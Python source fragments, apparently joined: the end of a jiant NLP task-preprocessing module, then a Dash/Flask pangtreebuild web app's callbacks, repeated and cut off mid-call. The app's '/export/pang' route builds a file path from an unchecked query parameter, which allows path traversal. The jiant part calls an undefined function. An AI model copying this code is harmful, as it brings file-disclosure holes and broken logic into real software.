cache_found = _find_cached_file(
args.exp_dir, args.global_ro_exp_dir, relative_path, log_prefix=log_prefix
)
if force_reindex or not cache_found:
# Re-index from scratch.
record_file = _get_serialized_record_path(task.name, split, preproc_dir)
if os.path.exists(record_file) and os.path.islink(record_file):
os.remove(record_file)
_index_split(task, split, indexers, vocab, record_file)
# Delete in-memory data - we'll lazy-load from disk later.
# TODO: delete task.{split}_data_text as well?
task.train_data = None
task.val_data = None
task.test_data = None
log.info("\tFinished indexing tasks")
# 5) Initialize tasks with data iterators.
pretrain_tasks = []
target_tasks = []
for task in tasks:
# Replace lists of instances with lazy generators from disk.
task.val_data = _get_instance_generator(task.name, "val", preproc_dir)
task.test_data = _get_instance_generator(task.name, "test", preproc_dir)
# When using pretrain_data_fraction, we need modified iterators for use
# only on training datasets at pretraining time.
if task.name in pretrain_task_names:
log.info("\tCreating trimmed pretraining-only version of " + task.name + " train.")
task.pretrain_fraction = float(args.get(f"pretrain_{(task.name).replace('-', '_')}_fraction", 1.0))
#task.pretrain_fraction = args.pretrain_data_fraction # Original
log.info(f"Task {task.name} instance generator using {task.pretrain_fraction * 100}% of training data.")
task.train_data = _get_instance_generator(
task.name, "train", preproc_dir, fraction=task.pretrain_fraction
)
pretrain_tasks.append(task)
# When using target_train_data_fraction, we need modified iterators
# only for training datasets at do_target_task_training time.
if task.name in target_task_names:
log.info("\tCreating trimmed target-only version of " + task.name + " train.")
task.target_train_fraction = float(args.get(f"target_train_{(task.name).replace('-', '_')}_fraction", 1.0))
#task.target_train_fraction = args.target_train_data_fraction # Original
task.train_data = _get_instance_generator(
task.name, "train", preproc_dir, fraction=task.target_train_fraction
)
target_tasks.append(task)
log.info("\t Training on %s", ", ".join(pretrain_task_names))
log.info("\t Evaluating on %s", ", ".join(target_task_names))
return pretrain_tasks, target_tasks, vocab, word_embs
def parse_task_list_arg(task_list):
"""Parse task list argument into a list of task names."""
task_names = []
for task_name in task_list.split(","):
if task_name == "glue":
task_names.extend(ALL_GLUE_TASKS)
elif task_name == "superglue":
task_names.extend(ALL_SUPERGLUE_TASKS)
elif task_name == "none" or task_name == "":
continue
else:
task_names.append(task_name)
return task_names
def _get_task(name, args, data_path, scratch_path):
""" Build or load a single task. """
assert name in TASKS_REGISTRY, f"Task '{name:s}' not found!"
task_cls, rel_path, task_kw = TASKS_REGISTRY[name]
pkl_path = os.path.join(scratch_path, "tasks", f"{name:s}.{args.tokenizer:s}.pkl")
# TODO: refactor to always read from disk, even if task is constructed
# here. This should avoid subtle bugs from deserialization issues.
if os.path.isfile(pkl_path) and not args.reload_tasks:
task = pkl.load(open(pkl_path, "rb"))
log.info("\tLoaded existing task %s", name)
else:
log.info("\tCreating task %s from scratch.", name)
# These tasks take an additional kwarg.
if name == "nli-prob" or name == "nli-alt":
# TODO: remove special case, replace with something general
# to pass custom loader args to task.
task_kw["probe_path"] = args["nli-prob"].probe_path
task_src_path = os.path.join(data_path, rel_path)
task = task_cls(
task_src_path,
max_seq_len=args.max_seq_len,
name=name,
tokenizer_name=args.tokenizer,
**task_kw,
)
task.load_data()
utils.maybe_make_dir(os.path.dirname(pkl_path))
pkl.dump(task, open(pkl_path, "wb"))
return task
def get_task_without_loading_data(task_name, args):
""" Build a task without loading data """
task_cls, rel_path, task_kw = TASKS_REGISTRY[task_name]
task = task_cls(
path=None,
max_seq_len=args.max_seq_len,
name=task_name,
tokenizer_name=args.tokenizer,
**task_kw,
)
return task
def get_tasks(args):
""" Actually build or load (from pickles) the tasks. """
data_path = args.data_dir
scratch_path = args.exp_dir
pretrain_task_names = parse_task_list_arg(args.pretrain_tasks)
target_task_names = parse_task_list_arg(args.target_tasks)
# TODO: We don't want diagnostic tasks in train_task_names
# but want to support glue/superglue task macros.
pretrain_task_names = list(filter(lambda x: x not in ALL_DIAGNOSTICS, pretrain_task_names))
task_names = sorted(set(pretrain_task_names + target_task_names))
assert data_path is not None
scratch_path = scratch_path or data_path
log.info("Writing pre-preprocessed tasks to %s", scratch_path)
tasks = []
for name in task_names:
task = _get_task(name, args, data_path=data_path, scratch_path=scratch_path)
tasks.append(task)
# Count examples, store in example_counts.
if task.example_counts is None:
task.count_examples()
log.info(
"\tTask '%s': %s",
task.name,
" ".join(("|%s|=%d" % kv for kv in task.example_counts.items())),
)
log.info("\tFinished loading tasks: %s.", " ".join([task.name for task in tasks]))
return tasks, pretrain_task_names, target_task_names
def get_words(tasks):
"""
Get all words for all tasks for all splits for all sentences
Return dictionary mapping words to frequencies.
"""
word2freq, char2freq = defaultdict(int), defaultdict(int)
def update_vocab_freqs(sentence):
"""Update counts for words in the sentence"""
for word in sentence:
word2freq[word] += 1
for char in list(word):
char2freq[char] += 1
return
for task in tasks:
log.info("\tCounting words for task %s.", task.name)
for sentence in task.get_sentences():
update_vocab_freqs(sentence)
# This branch is meant for tasks that have *English* target sentences
# (or more generally, same language source and target sentences)
# Tasks with different language source and target sentences should
# count and return the vocab in a `task.all_labels()` method.
for task in tasks:
if hasattr(task, "target_sentences"):
for sentence in task.target_sentences:
update_target_vocab_freqs(sentence)
return word2freq, char2freq
def get_vocab(word2freq, char2freq, max_v_sizes):
"""Build vocabulary by selecting the most frequent tokens"""
vocab = Vocabulary(counter=None, max_vocab_size=max_v_sizes)
for special in SPECIALS:
vocab.add_token_to_namespace(special, "tokens")
words_by_freq = [(word, freq) for word, freq in word2freq.items()]
words_by_freq.sort(key=lambda x: x[1], reverse=True)
for word, _ in words_by_freq[: max_v_sizes["word"]]:
vocab.add_token_to_namespace(word, "tokens")
chars_by_freq = [(char, freq) for char, freq in char2freq.items()]
chars_by_freq.sort(key=lambda x: x[1], reverse=True)
for char, _ in chars_by_freq[: max_v_sizes["char"]]:
vocab.add_token_to_namespace(char, "chars")
return vocab
def add_task_label_vocab(vocab, task):
"""Add custom task labels to a separate namespace.
If task has a 'get_all_labels' method, call that to get a list of labels
to populate the <task_name>_labels vocabulary namespace.
This is the recommended way to implement multiclass models: in your task's
process_split code, make instances that use LabelFields with the task label
namespace, e.g.:
label_namespace = "%s_labels" % self.name
label = LabelField(label_string, label_namespace=label_namespace)
This will cause them to be properly indexed by the Vocabulary.
This can then be accessed when generating Instances, either via a custom
Indexer or by invoking the namespace when creating a LabelField.
"""
if not hasattr(task, "get_all_labels"):
return
utils.assert_for_log(
hasattr(task, "_label_namespace"),
"Task %s is missing method `_label_namespace`!" % task.name,
)
namespace = task._label_namespace
if namespace is None:
return
log.info("\tTask '%s': adding vocab namespace '%s'", task.name, namespace)
for label in task.get_all_labels():
vocab.add_token_to_namespace(label, namespace)
def add_bert_wpm_vocab(vocab, bert_model_name):
"""Add BERT WPM vocabulary for use with pre-tokenized data.
BertTokenizer has a convert_tokens_to_ids method, but this doesn't do
anything special so we can just use the standard indexers.
"""
from pytorch_pretrained_bert import BertTokenizer
do_lower_case = "uncased" in bert_model_name
tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=do_lower_case)
ordered_vocab = tokenizer.convert_ids_to_tokens(range(len(tokenizer.vocab)))
log.info("BERT WPM vocab (model=%s): %d tokens", bert_model_name, len(ordered_vocab))
for word in ordered_vocab:
vocab.add_token_to_namespace(word, bert_model_name)
def add_openai_bpe_vocab(vocab, namespace="openai_bpe"):
"""Add OpenAI BPE vocabulary for use with pre-tokenized data."""
from .openai_transformer_lm import utils as openai_utils
id_to_wordpiece = openai_utils.reverse_encoder_dict
for i in range(len(id_to_wordpiece)):
vocab.add_token_to_namespace(id_to_wordpiece[i], namespace)
# Add SOS and EOS tokens to *end* of namespace, since this is where the
# OpenAI model expects special tokens.
vocab.add_token_to_namespace(utils.SOS_TOK, namespace)
vocab.add_token_to_namespace(utils.EOS_TOK, namespace)
def add_wsj_vocab(vocab, data_dir, namespace="tokens"):
"""Add WSJ vocabulary for PTB parsing models."""
wsj_vocab_path = os.path.join(data_dir, "WSJ/tokens.txt")
# To create the tokens.txt file: Run only WSJ LM baseline on jiant, and
# duplicate the vocab file generated.
assert os.path.exists(wsj_vocab_path), "WSJ vocab file doesn't exist."
wsj_tokens = open(wsj_vocab_path)
for line in wsj_tokens.readlines():
vocab.add_token_to_namespace(line.strip(), namespace)
log.info("\tAdded WSJ vocabulary from %s", wsj_tokens)
|
import io
import os
import base64
from io import StringIO
from pathlib import Path
from typing import Dict, List
import dash
import dash_html_components as html
import flask
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pangtreebuild.affinity_tree.parameters import Blosum, Hbmin, Stop, P
from pangtreebuild.pangenome.graph import DataType
from pangtreebuild.pangenome.parameters.missings import FromFile, FromNCBI, MissingBase
from pangtreebuild.pangenome.parameters.msa import Maf, Po, MetadataCSV
from pangtreebuild.serialization.json import to_json
from dash_app.components import pangtreebuild, tools
from dash_app.layout.pages import get_task_description_layout
from dash_app.server import app
def get_success_info(message):
return [html.I(className="fas fa-check-circle correct"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
def get_error_info(message):
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("data_type", 'value'),
Output("metadata_upload", 'filename'),
Output("metadata_upload", 'contents'),
Output("multialignment_upload", 'filename'),
Output("multialignment_upload", 'contents'),
Output("fasta_provider_choice", "value"),
Output("fasta_upload", 'filename'),
Output("fasta_upload", 'contents')],
[Input("use-toy-button", 'n_clicks'),
Input("use-ebola_subset-button", 'n_clicks'),
Input("use-ebola-button", 'n_clicks')])
def get_example(toy_n_clicks, ebola_subset_n_clicks, ebola_n_clicks):
changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]
if "toy" in changed_id:
example_folder = "toy_example"
metadata_file = "metadata.csv"
multialignment_file = "f.maf"
fasta_file = "sequence.fasta"
elif "ebola_subset" in changed_id:
example_folder = "ebola_subset"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
elif "ebola" in changed_id:
example_folder = "ebola"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
with open(f"example_data/pangtreebuild/{example_folder}/{metadata_file}") as f:
metadata_content = tools.encode_content(f.read())
with open(f"example_data/pangtreebuild/{example_folder}/{multialignment_file}") as f:
multialignment_content = tools.encode_content(f.read())
if fasta_file:
fasta_provider_choice = "File"
with open(f"example_data/pangtreebuild/{example_folder}/{fasta_file}") as f:
fasta_content = tools.encode_content(f.read())
else:
fasta_provider_choice = "NCBI"
fasta_content = None
return "Nucleotides", metadata_file, metadata_content, multialignment_file, multialignment_content, fasta_provider_choice, fasta_file, fasta_content
# Metadata Validation
@app.callback(Output("metadata_upload_state", 'data'),
[Input("metadata_upload", 'contents')],
[State("metadata_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.metadata_file_is_valid(file_content, file_name)
is_file_correct = True if len(error_message) == 0 else False
return {"is_correct": is_file_correct, "filename": file_name, "error": error_message}
@app.callback(Output("metadata_upload_state_info", 'children'),
[Input("metadata_upload_state", 'data')])
def show_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
return get_error_info(upload_state_data["error"])
# Multialignment validation
@app.callback(Output("multialignment_upload_state", 'data'),
[Input("multialignment_upload", 'contents')],
[State("multialignment_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
else:
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.multialignment_file_is_valid(file_content, file_name)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("multialignment_upload_state_info", 'children'),
[Input("multialignment_upload_state", 'data')])
def show_multialignment_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
else:
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
else:
return get_error_info(upload_state_data["error"])
# MAF specific parameters toggling
@app.callback(Output("maf_specific_params", 'is_open'),
[Input("multialignment_upload_state", 'data')])
def toggle_maf_specific_params(multialignment_upload_state_data):
if multialignment_upload_state_data and "maf" in multialignment_upload_state_data["filename"]:
return True
return False
@app.callback([Output("missing_symbol_param", 'is_open'),
Output("fasta_upload_param", 'is_open')],
[Input("fasta_provider_choice", 'value')])
def toggle_mising_symbol_param(fasta_provider_choice):
return fasta_provider_choice == "Symbol", fasta_provider_choice == "File"
# FASTA VALIDATION
@app.callback(Output("fasta_upload_state", 'data'),
[Input("fasta_upload", 'contents'),
Input("session_dir", 'data')],
[State("fasta_upload", 'filename')])
def validate_fasta_file(file_content, session_dir, file_name):
if file_content is None or file_name is None or session_dir is None:
return None
else:
if ".zip" in file_name:
file_content = tools.decode_zip_content(file_content)
else:
file_content = tools.decode_content(file_content)
output_dir = Path(session_dir)
fasta_path = tools.get_child_path(output_dir, file_name)
if ".zip" in file_name:
tools.save_to_file(file_content, fasta_path, 'wb')
else:
tools.save_to_file(file_content, fasta_path)
error_message = pangtreebuild.fasta_file_is_valid(fasta_path)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("fasta_upload_state_info", 'children'),
[Input("fasta_upload_state", 'data')])
def show_fasta_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
else:
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
else:
return get_error_info(upload_state_data["error"])
@app.callback(Output("blosum_upload_state_info", 'children'),
[Input("blosum_upload_state", 'data')])
def show_validation_result(blosum_upload_state_data):
if blosum_upload_state_data is None or len(blosum_upload_state_data) == 0:
return get_success_info("")
else:
validation_message = blosum_upload_state_data["validation_message"]
if blosum_upload_state_data["is_correct"]:
return [html.I(className="fas fa-check-circle correct"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
else:
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("poa_specific_params", 'is_open'),
Output("tree_specific_params", 'is_open')],
[Input("consensus_algorithm_choice", 'value')])
def consensus_specific_params(consensus_algorithm_choice):
return consensus_algorithm_choice == "poa", consensus_algorithm_choice == "tree"
@app.callback(Output("session_dir", 'data'),
[Input("fasta_upload", 'contents')],
[State("session_dir", 'data')])
def create_output_dir(_, session_dir):
if session_dir is None:
output_dir = tools.create_output_dir()
session_dir = str(output_dir)
return session_dir
@app.callback(
Output("ebola_collapse", "is_open"),
[Input("collapse-ebola-button", "n_clicks")],
[State("ebola_collapse", "is_open")],
)
def toggle_ebola_example_collapse(ebola_btn_clicks, is_open):
if ebola_btn_clicks:
return not is_open
return is_open
@app.callback(
Output("toy_example_collapse", "is_open"),
[Input("collapse-toy-example-button", "n_clicks")],
[State("toy_example_collapse", "is_open")],
)
def toggle_ebola_example_collapse(toy_example_btn_clicks, is_open):
if toy_example_btn_clicks:
return not is_open
return is_open
@app.callback(
[Output("session_state", 'data'),
Output('confirm_run', 'displayed')],
[Input("pang_button", 'n_clicks')],
[State("session_state", 'data'),
State("session_dir", 'data'),
State("data_type", "value"),
State("multialignment_upload", "contents"),
State("multialignment_upload", "filename"),
State("fasta_provider_choice", "value"),
State("fasta_upload", "contents"),
State("fasta_upload", "filename"),
State("missing_symbol_input", "value"),
# State("blosum_upload", "contents"),
# State("blosum_upload", "filename"),
State("consensus_algorithm_choice", "value"),
State("output_configuration", "value"),
State("metadata_upload", "contents"),
State("metadata_upload", "filename"),
State("hbmin_input", "value"),
State("stop_input", "value"),
State("p_input", "value")],
)
def run_pangenome(run_processing_btn_click,
session_state: Dict,
session_dir: str,
datatype: str,
multialignment_content: str,
multialignment_filename: str,
fasta_provider_choice: str,
fasta_content: str,
fasta_filename: str,
missing_symbol: str,
consensus_choice: str,
output_config: List[str],
metadata_content: str,
metadata_filename: str,
hbmin_value: float,
stop_value: float,
p_value: float):
if run_processing_btn_click == 0:
raise PreventUpdate()
if session_state is None:
session_state = {}
if session_dir is None:
session_dir = tools.create_output_dir()
else:
session_dir = Path(session_dir)
current_processing_output_dir_name = tools.get_child_path(session_dir, tools.get_current_time())
tools.create_dir(current_processing_output_dir_name)
if multialignment_filename and "maf" in multialignment_filename:
multialignment = Maf(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
elif multialignment_filename and "po" in multialignment_filename:
multialignment = Po(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
else:
session_state["error"] = "Cannot create Poagraph. Only MAF and PO files are supported."
return session_state
missing_symbol = MissingBase(missing_symbol) if missing_symbol != "" else MissingBase()
fasta_path = None
if fasta_provider_choice == "NCBI":
fasta_provider = FromNCBI(use_cache=True)
elif fasta_provider_choice == "File":
fasta_path = tools.get_child_path(current_processing_output_dir_name,
fasta_filename).resolve()
save_mode = "wb" if "zip" in fasta_filename else "w"
if "zip" in fasta_filename:
fasta_decoded_content = tools.decode_zip_content(fasta_content)
else:
fasta_decoded_content = tools.decode_content(fasta_content)
tools.save_to_file(fasta_decoded_content, fasta_path, save_mode)
fasta_provider = FromFile(fasta_path)
blosum_path = pangtreebuild.get_default_blosum_path()
blosum_contents = tools.read_file_to_stream(blosum_path)
blosum = Blosum(blosum_contents, blosum_path)
metadata = MetadataCSV(StringIO(tools.decode_content(metadata_content)),
metadata_filename) if metadata_content else None
pangenomejson = pangtreebuild.run_pangtreebuild(
output_dir=current_processing_output_dir_name,
datatype=DataType[datatype],
multialignment=multialignment,
fasta_provider=fasta_provider,
blosum=blosum,
consensus_choice=consensus_choice,
output_po=True if "po" in output_config else False,
output_fasta=True if "fasta" in output_config else False,
output_newick=True if "newick" in output_config else False,
missing_symbol=missing_symbol,
metadata=metadata,
hbmin=Hbmin(hbmin_value) if hbmin_value else None,
stop=Stop(stop_value) if stop_value else None,
p=P(p_value) if p_value else None,
fasta_path=fasta_filename if fasta_filename else None,
include_nodes=True # if "nodes" in output_config else False
)
pangenome_json_str = to_json(pangenomejson)
current_processing_output_zip = tools.dir_to_zip(current_processing_output_dir_name)
current_processing_short_name = "/".join(str(current_processing_output_zip).split("/")[-2:])
return {"last_output_zip": current_processing_short_name,
"jsonpangenome": pangenome_json_str,
"error": ""}, True
@app.callback(Output("download_processing_result", "href"),
[Input("session_state", 'data')])
def update_download_result_content(session_state_data):
if session_state_data is None:
raise PreventUpdate()
if not "last_output_zip" in session_state_data:
return ""
return f'/export/pang?n={session_state_data['last_output_zip']}'
@app.server.route('/export/pang')
def export_pang_result_zip():
zip_short_path = flask.request.args.get('n')
zip_full_path = Path(os.path.abspath(os.path.join(os.path.dirname(__file__)))).joinpath(
"../../users_temp_data/").joinpath(zip_short_path)
with open(zip_full_path, 'rb') as f:
data = io.BytesIO(f.read())
data.seek(0)
result_id = zip_short_path.split("/")[1]
return flask.send_file(
data,
mimetype='application/zip',
attachment_filename=f'result_{result_id}',
as_attachment=True,
cache_timeout=0
)
@app.callback(Output("poapangenome_result", "is_open"),
[Input("session_state", 'data')])
def open_poapangenome_result(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return False
return True
@app.callback(Output("poapangenome_result_description", "children"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return []
jsonpangenome = tools.unjsonify_jsonpangenome(session_state_data["jsonpangenome"])
poapangenome_task_description = get_task_description_layout(jsonpangenome)
return poapangenome_task_description
@app.callback(Output("result_icon", "className"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return ""
if session_state_data["error"]:
return "fas fa-times-circle incorrect"
else:
return "fas fa-check-circle correct"
| import io
import os
import base64
from io import StringIO
from pathlib import Path
from typing import Dict, List
import dash
import dash_html_components as html
import flask
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from pangtreebuild.affinity_tree.parameters import Blosum, Hbmin, Stop, P
from pangtreebuild.pangenome.graph import DataType
from pangtreebuild.pangenome.parameters.missings import FromFile, FromNCBI, MissingBase
from pangtreebuild.pangenome.parameters.msa import Maf, Po, MetadataCSV
from pangtreebuild.serialization.json import to_json
from dash_app.components import pangtreebuild, tools
from dash_app.layout.pages import get_task_description_layout
from dash_app.server import app
def get_success_info(message):
return [html.I(className="fas fa-check-circle correct"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
def get_error_info(message):
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(message, style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("data_type", 'value'),
Output("metadata_upload", 'filename'),
Output("metadata_upload", 'contents'),
Output("multialignment_upload", 'filename'),
Output("multialignment_upload", 'contents'),
Output("fasta_provider_choice", "value"),
Output("fasta_upload", 'filename'),
Output("fasta_upload", 'contents')],
[Input("use-toy-button", 'n_clicks'),
Input("use-ebola_subset-button", 'n_clicks'),
Input("use-ebola-button", 'n_clicks')])
def get_example(toy_n_clicks, ebola_subset_n_clicks, ebola_n_clicks):
changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]
if "toy" in changed_id:
example_folder = "toy_example"
metadata_file = "metadata.csv"
multialignment_file = "f.maf"
fasta_file = "sequence.fasta"
elif "ebola_subset" in changed_id:
example_folder = "ebola_subset"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
elif "ebola" in changed_id:
example_folder = "ebola"
metadata_file = "metadata.csv"
multialignment_file = "multialignment.maf"
fasta_file = None
with open(f"example_data/pangtreebuild/{example_folder}/{metadata_file}") as f:
metadata_content = tools.encode_content(f.read())
with open(f"example_data/pangtreebuild/{example_folder}/{multialignment_file}") as f:
multialignment_content = tools.encode_content(f.read())
if fasta_file:
fasta_provider_choice = "File"
with open(f"example_data/pangtreebuild/{example_folder}/{fasta_file}") as f:
fasta_content = tools.encode_content(f.read())
else:
fasta_provider_choice = "NCBI"
fasta_content = None
return "Nucleotides", metadata_file, metadata_content, multialignment_file, multialignment_content, fasta_provider_choice, fasta_file, fasta_content
# Metadata Validation
@app.callback(Output("metadata_upload_state", 'data'),
[Input("metadata_upload", 'contents')],
[State("metadata_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.metadata_file_is_valid(file_content, file_name)
is_file_correct = True if len(error_message) == 0 else False
return {"is_correct": is_file_correct, "filename": file_name, "error": error_message}
@app.callback(Output("metadata_upload_state_info", 'children'),
[Input("metadata_upload_state", 'data')])
def show_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
return get_error_info(upload_state_data["error"])
# Multialignment validation
@app.callback(Output("multialignment_upload_state", 'data'),
[Input("multialignment_upload", 'contents')],
[State("multialignment_upload", 'filename')])
def validate_metadata_file(file_content, file_name):
if file_content is None or file_name is None:
return None
else:
file_content = tools.decode_content(file_content)
error_message = pangtreebuild.multialignment_file_is_valid(file_content, file_name)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("multialignment_upload_state_info", 'children'),
[Input("multialignment_upload_state", 'data')])
def show_multialignment_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
else:
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
else:
return get_error_info(upload_state_data["error"])
# MAF specific parameters toggling
@app.callback(Output("maf_specific_params", 'is_open'),
[Input("multialignment_upload_state", 'data')])
def toggle_maf_specific_params(multialignment_upload_state_data):
if multialignment_upload_state_data and "maf" in multialignment_upload_state_data["filename"]:
return True
return False
@app.callback([Output("missing_symbol_param", 'is_open'),
Output("fasta_upload_param", 'is_open')],
[Input("fasta_provider_choice", 'value')])
def toggle_mising_symbol_param(fasta_provider_choice):
return fasta_provider_choice == "Symbol", fasta_provider_choice == "File"
# FASTA VALIDATION
@app.callback(Output("fasta_upload_state", 'data'),
[Input("fasta_upload", 'contents'),
Input("session_dir", 'data')],
[State("fasta_upload", 'filename')])
def validate_fasta_file(file_content, session_dir, file_name):
if file_content is None or file_name is None or session_dir is None:
return None
else:
if ".zip" in file_name:
file_content = tools.decode_zip_content(file_content)
else:
file_content = tools.decode_content(file_content)
output_dir = Path(session_dir)
fasta_path = tools.get_child_path(output_dir, file_name)
if ".zip" in file_name:
tools.save_to_file(file_content, fasta_path, 'wb')
else:
tools.save_to_file(file_content, fasta_path)
error_message = pangtreebuild.fasta_file_is_valid(fasta_path)
if len(error_message) == 0:
return {"is_correct": True, "filename": file_name, "error": error_message}
else:
return {"is_correct": False, "filename": file_name, "error": error_message}
@app.callback(Output("fasta_upload_state_info", 'children'),
[Input("fasta_upload_state", 'data')])
def show_fasta_validation_result(upload_state_data):
if upload_state_data is None or len(upload_state_data) == 0:
return get_error_info("")
else:
if upload_state_data["is_correct"]:
filename = upload_state_data["filename"]
return get_success_info(f"File {filename} is uploaded.")
else:
return get_error_info(upload_state_data["error"])
@app.callback(Output("blosum_upload_state_info", 'children'),
[Input("blosum_upload_state", 'data')])
def show_validation_result(blosum_upload_state_data):
if blosum_upload_state_data is None or len(blosum_upload_state_data) == 0:
return get_success_info("")
else:
validation_message = blosum_upload_state_data["validation_message"]
if blosum_upload_state_data["is_correct"]:
return [html.I(className="fas fa-check-circle correct"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
else:
return [html.I(className="fas fa-exclamation-circle incorrect"),
html.P(f"{validation_message}",
style={"display": "inline", "margin-left": "10px"})]
@app.callback([Output("poa_specific_params", 'is_open'),
Output("tree_specific_params", 'is_open')],
[Input("consensus_algorithm_choice", 'value')])
def consensus_specific_params(consensus_algorithm_choice):
return consensus_algorithm_choice == "poa", consensus_algorithm_choice == "tree"
@app.callback(Output("session_dir", 'data'),
[Input("fasta_upload", 'contents')],
[State("session_dir", 'data')])
def create_output_dir(_, session_dir):
if session_dir is None:
output_dir = tools.create_output_dir()
session_dir = str(output_dir)
return session_dir
@app.callback(
Output("ebola_collapse", "is_open"),
[Input("collapse-ebola-button", "n_clicks")],
[State("ebola_collapse", "is_open")],
)
def toggle_ebola_example_collapse(ebola_btn_clicks, is_open):
if ebola_btn_clicks:
return not is_open
return is_open
@app.callback(
Output("toy_example_collapse", "is_open"),
[Input("collapse-toy-example-button", "n_clicks")],
[State("toy_example_collapse", "is_open")],
)
def toggle_ebola_example_collapse(toy_example_btn_clicks, is_open):
if toy_example_btn_clicks:
return not is_open
return is_open
@app.callback(
[Output("session_state", 'data'),
Output('confirm_run', 'displayed')],
[Input("pang_button", 'n_clicks')],
[State("session_state", 'data'),
State("session_dir", 'data'),
State("data_type", "value"),
State("multialignment_upload", "contents"),
State("multialignment_upload", "filename"),
State("fasta_provider_choice", "value"),
State("fasta_upload", "contents"),
State("fasta_upload", "filename"),
State("missing_symbol_input", "value"),
# State("blosum_upload", "contents"),
# State("blosum_upload", "filename"),
State("consensus_algorithm_choice", "value"),
State("output_configuration", "value"),
State("metadata_upload", "contents"),
State("metadata_upload", "filename"),
State("hbmin_input", "value"),
State("stop_input", "value"),
State("p_input", "value")],
)
def run_pangenome(run_processing_btn_click,
session_state: Dict,
session_dir: str,
datatype: str,
multialignment_content: str,
multialignment_filename: str,
fasta_provider_choice: str,
fasta_content: str,
fasta_filename: str,
missing_symbol: str,
consensus_choice: str,
output_config: List[str],
metadata_content: str,
metadata_filename: str,
hbmin_value: float,
stop_value: float,
p_value: float):
if run_processing_btn_click == 0:
raise PreventUpdate()
if session_state is None:
session_state = {}
if session_dir is None:
session_dir = tools.create_output_dir()
else:
session_dir = Path(session_dir)
current_processing_output_dir_name = tools.get_child_path(session_dir, tools.get_current_time())
tools.create_dir(current_processing_output_dir_name)
if multialignment_filename and "maf" in multialignment_filename:
multialignment = Maf(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
elif multialignment_filename and "po" in multialignment_filename:
multialignment = Po(StringIO(tools.decode_content(multialignment_content)),
file_name=multialignment_filename)
else:
session_state["error"] = "Cannot create Poagraph. Only MAF and PO files are supported."
return session_state
missing_symbol = MissingBase(missing_symbol) if missing_symbol != "" else MissingBase()
fasta_path = None
if fasta_provider_choice == "NCBI":
fasta_provider = FromNCBI(use_cache=True)
elif fasta_provider_choice == "File":
fasta_path = tools.get_child_path(current_processing_output_dir_name,
fasta_filename).resolve()
save_mode = "wb" if "zip" in fasta_filename else "w"
if "zip" in fasta_filename:
fasta_decoded_content = tools.decode_zip_content(fasta_content)
else:
fasta_decoded_content = tools.decode_content(fasta_content)
tools.save_to_file(fasta_decoded_content, fasta_path, save_mode)
fasta_provider = FromFile(fasta_path)
blosum_path = pangtreebuild.get_default_blosum_path()
blosum_contents = tools.read_file_to_stream(blosum_path)
blosum = Blosum(blosum_contents, blosum_path)
metadata = MetadataCSV(StringIO(tools.decode_content(metadata_content)),
metadata_filename) if metadata_content else None
pangenomejson = pangtreebuild.run_pangtreebuild(
output_dir=current_processing_output_dir_name,
datatype=DataType[datatype],
multialignment=multialignment,
fasta_provider=fasta_provider,
blosum=blosum,
consensus_choice=consensus_choice,
output_po=True if "po" in output_config else False,
output_fasta=True if "fasta" in output_config else False,
output_newick=True if "newick" in output_config else False,
missing_symbol=missing_symbol,
metadata=metadata,
